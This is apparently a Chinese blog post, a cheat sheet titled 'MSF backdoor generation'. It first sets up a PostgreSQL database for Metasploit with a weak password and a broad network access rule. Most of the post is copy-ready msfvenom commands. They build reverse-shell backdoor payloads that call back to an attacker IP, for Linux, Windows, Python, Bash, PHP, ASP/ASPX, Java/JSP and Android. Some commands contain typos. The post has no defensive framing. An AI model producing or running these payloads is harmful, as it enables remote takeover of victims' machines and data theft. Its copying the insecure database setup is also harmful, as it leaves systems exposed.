MSF后门生成
0x00 Metasploit连接数据库
启动数据库
service postgresql start |
查看是否启动成功
service postgresql status |
进入postgresql配置
sudo -u postgrs psql |
修改数据库配置
进入以下目录 |
在pg_hba.conf文件最后添加一条数据
host all all 0.0.0.0/24 md5 |
重启数据库服务
service postgresql restart |
连接数据库
psql -U postgres -h 127.0.0.1 |
创建数据库
输入以下命令连接数据库
create user msf with password 'admin' createdb; |
打开metasploit
命令:msfconsole |
配置自动登录
cd /usr/share/metasploit-framework/config |
0x01 MSF生成shell
Linux反弹Meterpreter Shell
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.1.1 LPORT=4444 -f elf -o shell.elf |
生成windows反弹shell(C Shellcode)
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.2.146 LPORT=4444 -f exe >test.exe |
生成Python反弹shell
msfvenom -p cmd/unix/reverse_python LHOST=127.0.0.1 LPORT=443 -o shell.py |
生成Asp反弹shell
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.2.146 LPORT=1234 -f asp > shell.asp |
生成Bash反弹shell
msfvenom -p cmd/unix/reverse_bash LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -o shell.sh |
生成php反弹shell
msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.2.146 LPORT=1234 -f raw >text.php |
生成java反弹shell
msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.2.146 LPORT=1234 W >text.jar |
生成jsp反弹shell
msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.2.146 LPORT=1234 -f raw > shell.jsp |
生成aspx反弹shell
msfvenom -a x86 --platform win -p windows/meterpreter/reverse_tcp LHOST= 192.168.1.109 LPORT=7788 -f aspx x> /home/niexinming/back.aspx |
生成安卓反弹shell
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.2.146 LPORT=1234 R >text.apk |
获取反弹回来的shell,进入msf
选择模块 |
本博客所有文章除特别声明外,均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来自 Time'Blog!
评论